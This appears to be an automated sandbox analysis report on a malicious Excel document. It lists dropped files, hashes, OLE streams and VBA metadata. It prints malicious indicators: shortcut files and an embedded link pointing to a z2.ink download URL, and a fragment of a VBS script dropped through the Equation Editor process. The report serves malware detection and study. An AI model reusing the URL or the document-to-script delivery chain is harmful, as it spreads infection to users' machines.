            Encrypted:false
            SSDEEP:6:I3DPczkx9vxggLRVefUIxnCtDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKkRQPg3vYg3J/
            MD5:9BAA85916F08F558262C035291B86B95
            SHA1:437B9E6B79B0ED9F29284622B30A3D00C2F328D7
            SHA-256:1274B9503A3133A301FBE723FCCEA8C66BB38C31DE992ADBC0B87EA2AA1ABC92
            SHA-512:14932C5BA635ADE73AAB052CA8306A0B60CBBB3A25431A9A2FBD804CF408EFCC035A3EEBE8DBEE3F4DFB652927CB6AD1AD2D58AAB8A7E1D24824DD0459F96967
            Malicious:false
            Preview:......M.eFy...z.c>.IlM..=./:.(S,...X.F...Fa.q..................................uL..8_..!........;.i.{..H.~..-........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\~DF413A5A3890D32AE4.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):1.0004922970899908
            Encrypted:false
            SSDEEP:48:mjWaNg3ZdMvvNrUWAUz5ZVgp9CyCU0FkQSbQ0uw/prMl:mj43ZdM9rUzUz6uUpU0uwul
            MD5:5CE3FB79EE6C60C1A8598EB838F65EE9
            SHA1:42CD18B04B86642F7B4EF6DBA35BE29AA1A9407C
            SHA-256:AE88629ABE441163B2F3DEA9D0D8B5AA97FCECC20673B6AE9D7AD3633BEE1B74
            SHA-512:DCDF1CE7CCAF4E0DD9EAC7FEAF64368E6867DE5F0C25CD3D30E75AB7C6EE34B1E32687F48F5826D6392E59F2F794B3C915D7885A9D00E6AA1195B08F3193360C
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\~DFA4A63D3B720884E3.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\~DFBAFA395254C35D69.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Generic INItialization configuration [xls]
            Category:modified
            Size (bytes):104
            Entropy (8bit):4.6614482522919465
            Encrypted:false
            SSDEEP:3:bDCE4LZXHlyMgLp6lmMYEyMgLp6lv:bmTZXsrLp6xY3rLp61
            MD5:A174FE7EEED4840D94F4D3B9778092CA
            SHA1:409397EB44BEC23FC3F71859E49670408CA60F3D
            SHA-256:AD4DF6C72323783796827F917B8CADAD7FDAD3A5BFA8DCC62F5A633DD9BD64D5
            SHA-512:DEE73741ABED0DC58B2315CD7FCFFC0CB3A72858090C3FC6E97123317620BD1B48DD42A10948A6C78207F75137F5D2EE16E9B90A5E97DBD99888137C51FBC7FC
            Malicious:false
            Preview:[folders]..nLNG.url=0..z2.ink.url=0..Ref19920830281982938RT.LNK=0..[xls]..Ref19920830281982938RT.LNK=0..

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nLNG.url

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nLNG>), ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):44
            Entropy (8bit):4.544325652580698
            Encrypted:false
            SSDEEP:3:HRAbABGQYm/5XGuyn:HRYFVm/5XSn
            MD5:66F53BD633596486420FCA4738ECFAAF
            SHA1:9D87EE7A931B50A15600CAC90A43C0C176940721
            SHA-256:F1E3011CC9E1C19AEBE58AD9D1E98A05A06A0CACB885A0A12D683EFFA56A74EC
            SHA-512:C450DEA170B1647885A600B28CC7A892EB0EAB9CD3DF2F7628FCF045D05CDDF7219B150C2CC2A243C9A6E8BF03C21ECED8B732B3AB5B0F2DC25EAE65E3DEAF5C
            Malicious:true
            Preview:[InternetShortcut]..URL=http://z2.ink/nLNG..

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):40
            Entropy (8bit):4.446439344671015
            Encrypted:false
            SSDEEP:3:HRAbABGQYm/5XG8n:HRYFVm/5XJn
            MD5:7F1FACEA6A36B544AC585A5173C32BBC
            SHA1:2B9A9BA3C87CEF7C19ED56EEBA30731D250D4726
            SHA-256:2A4741F9C5EDC7138E16555F591135B3258319D3DFF94D7864AF06AB73E66262
            SHA-512:16E1F8B87EF5D39867FF4B82D4F472EA059680C3344FFEF3F033F6410F9FA0D6626FB16E43DC041AB56606EBEFFC444D3CCC088581C18038DC32A9BC7318E41A
            Malicious:true
            Preview:[InternetShortcut]..URL=http://z2.ink/..

            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVywgmbVWtUykLC+ln:vdsCkWt3gmoUyd+l
            MD5:B37CE9E8345F9558D8E3AFB62D07B0DF
            SHA1:99057A85C270AC5FACCB9F49E1FEA3E73B1BC5BD
            SHA-256:B0542FB818F2CBEA824C83BE01289ED036D9BDF164970A75B018F43E26547FA4
            SHA-512:88C7BEFCBB413DA42095ADFFF91AA82350181FF6162718D0A98B4A2E6D472499B3647C3E33A119326A134AA96D9D97984E73695F1D4C59F29F06484E2CAC325F
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

            C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs

            Download File
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):156322
            Entropy (8bit):3.2657606017650114
            Encrypted:false
            SSDEEP:1536:Eokd99CObC6iLcme9aJK6CUrQhfW0/5JZUlBcNBg0BAbUZlu9gISsRQ:LkdvaJK62/2czg0BAcv
            MD5:AF216517B1AC9254BCFF5C37E6E80752
            SHA1:A5BED501BC6EC2A6E555D96FF175910CADB10B81
            SHA-256:AA849B703BB5635313B8CABE1F08C6BB0F5BCE5FA9D75260DA988584DA7A7471
            SHA-512:3ACDBF49F9D7A6E466E309E49CA66B9EB911F47B686E9753AC4DC23EE8149D330F767E79A808844CE1E2462153A4580B60D2D280FB1B29DC1855EF61AD675F82
            Malicious:true
            Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.

            C:\Users\user\Desktop\FE430000

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 08:00:58 2024, Security: 1
            Category:dropped
            Size (bytes):315904
            Entropy (8bit):7.961923710839547
            Encrypted:false
            SSDEEP:6144:JKHTgwUpRuqFkQERyOO5UsH893Ba2P748xW8U8Ap:K4uqrIzyH89xaSPxY86
            MD5:4D5E80215E1B09A79626F6594A90C360
            SHA1:C6CF6E8DF73FB055BC3CBEBEC7D3F2A07B644D47
            SHA-256:279D14B0AEB2A99BA9576D71C71E840FE16A3D17BDFC215D1B19B7DE6A827971
            SHA-512:F5C398025E6A541C7428BCCAF614286D28BF5B772EBCD2B3D659203C7C288C1932B9BE5F6AACE60C5893C5815D6412BA49C1C9D0CB525A1031C50C55A7861879
            Malicious:false
            Preview:......................>..................................."...................d.......f...............................................................................................................................................................................................................................................................................................................................................................................................................................................g................................................................................................................... ...!...........f...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

            C:\Users\user\Desktop\FE430000:Zone.Identifier

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Users\user\Desktop\Ref19920830281982938RT.xls (copy)

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 08:00:58 2024, Security: 1
            Category:dropped
            Size (bytes):315904
            Entropy (8bit):7.961923710839547
            Encrypted:false
            SSDEEP:6144:JKHTgwUpRuqFkQERyOO5UsH893Ba2P748xW8U8Ap:K4uqrIzyH89xaSPxY86
            MD5:4D5E80215E1B09A79626F6594A90C360
            SHA1:C6CF6E8DF73FB055BC3CBEBEC7D3F2A07B644D47
            SHA-256:279D14B0AEB2A99BA9576D71C71E840FE16A3D17BDFC215D1B19B7DE6A827971
            SHA-512:F5C398025E6A541C7428BCCAF614286D28BF5B772EBCD2B3D659203C7C288C1932B9BE5F6AACE60C5893C5815D6412BA49C1C9D0CB525A1031C50C55A7861879
            Malicious:false
            Preview:......................>..................................."...................d.......f...............................................................................................................................................................................................................................................................................................................................................................................................................................................g................................................................................................................... ...!...........f...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

            Static File Info

            General

            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 01:42:46 2024, Security: 1
            Entropy (8bit):7.9104018405793175
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:Ref19920830281982938RT.xls
            File size:315'392 bytes
            MD5:f5051793b6c98a29efba84f3821d1e30
            SHA1:b6b446e72525796444ae132fbb6af6788f08c5de
            SHA256:191a46b3849f0cc60ac2e0a3387585dd9c34e2b28cb66bffdbda08238ee53710
            SHA512:f8be2d2f6596deb0aac8d4770ba3cde80a39f3abdda9f9c32e0fd337c3a127fb518220bfad65528d29b9c4fa23a2312cadc08f9e2a3ababf1c9be4d44db9a9f6
            SSDEEP:6144:QKHTwu2pQHTIIwJsl5mAwKTwVbE7s9NEfUuqMQTZabPYDX:5QAExhKTWESoQTUPYD
            TLSH:2B6412E6315BC167C243C0B48CC2E1E7FBA8FE938F9656073392334E54762524A23A5E
            File Content Preview:........................>..................................."...................e.......g......................................................................................................................................................................

            File Icon

            Icon Hash:276ea3a6a6b7bfbf

            Static OLE Info

            General

            Document Type:OLE
            Number of OLE Files:1

            OLE File "Ref19920830281982938RT.xls"

            Indicators
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:True
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Summary
            Code Page:1252
            Author:
            Last Saved By:
            Create Time:2006-09-16 00:00:00
            Last Saved Time:2024-05-27 00:42:46
            Creating Application:Microsoft Excel
            Security:1
            Document Summary
            Document Code Page:1252
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:786432

            Streams with VBA

            VBA File Name: Sheet1.cls, Stream Size: 977
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8d 2a b7 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            VBA File Name: Sheet2.cls, Stream Size: 977
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8d 2a 0e d3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            VBA File Name: Sheet3.cls, Stream Size: 977
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
            VBA File Name:Sheet3.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8d 2a fd 3c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            VBA File Name: ThisWorkbook.cls, Stream Size: 985
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook.cls
            Stream Size:985
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * r . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8d 2a 72 b1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            Streams

            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.889430592781307
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:200
            Entropy:3.2603503175049817
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
            Stream Path: MBD001E4BEB/\x1CompObj, File Type: data, Stream Size: 99
            General
            Stream Path:MBD001E4BEB/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD001E4BEB/Package, File Type: Microsoft Excel 2007+, Stream Size: 15635
            General
            Stream Path:MBD001E4BEB/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:15635
            Entropy:7.539342686431913
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD001E4BEC/\x1Ole, File Type: data, Stream Size: 624
            General
            Stream Path:MBD001E4BEC/\x1Ole
            CLSID:
            File Type:data
            Stream Size:624
            Entropy:4.685768870238001
            Base64 Encoded:False
            Data ASCII:. . . . 7 _ . . | . . . . . . . . . . . . Z . . . y . . . K . V . . . h . t . t . p . : . / . / . z . 2 . . . i . n . k . / . n . L . N . G . . . h . . K t . . { < . . . % . . ~ ) . 5 s , . w . . . . . . . . . . . . . . . . . . . N . c . V . b . z . a . O . 2 . Y . F . M . 6 . V . h . C . z . C . T . B . Q . u . i . K . 9 . X . v . d . f . m . Z . m . f . d . i . 1 . 9 . q . S . y . k . k . u . S . o . q . G . g . 1 . 3 . i . d . x . w . q . M . 8 . 0 . I . 2 . Q . l . H . h . Y . k . a . 2 . 5 . m . h . e
            Data Raw:01 00 00 02 db 37 5f 14 f3 19 e2 7c 00 00 00 00 00 00 00 00 00 00 00 00 5a 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 56 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 7a 00 32 00 2e 00 69 00 6e 00 6b 00 2f 00 6e 00 4c 00 4e 00 47 00 00 00 b4 f7 68 14 c3 f9 1d 4b 74 96 da 19 bf 14 7b 3c b5 b5 14 16 bb 06 25 e8 c5 12 ec 1c a0 af 95 7e 29 b2 82 7f 96 35 85 73 ae d8
            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 282828
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:282828
            Entropy:7.998431357621911
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . 1 \\ V [ . F % 7 . . R . } . 6 z } x W . ] 2 l . . . . . . . . . . \\ . p . k K # . > ( S e r k . b . + > . t B . 2 # b h O 1 . * . k _ } e I * . 7 s F . t . . M # . # u - . . . ( . N | ! . B . . . C a . . . u . . . = . . . O l b Q . . . . D * X 2 U B . . . . . . . . . . . . . . . . . . . . . . . . . = . . . % . 0 C , ^ . g . . I ~ @ . . . 6 . . . . " . . . " . . . . . . . . . . . . } 1 . . . q . < . U p E ` N H . . s - N 1 . . . W ; 0 % l F . { & * . c
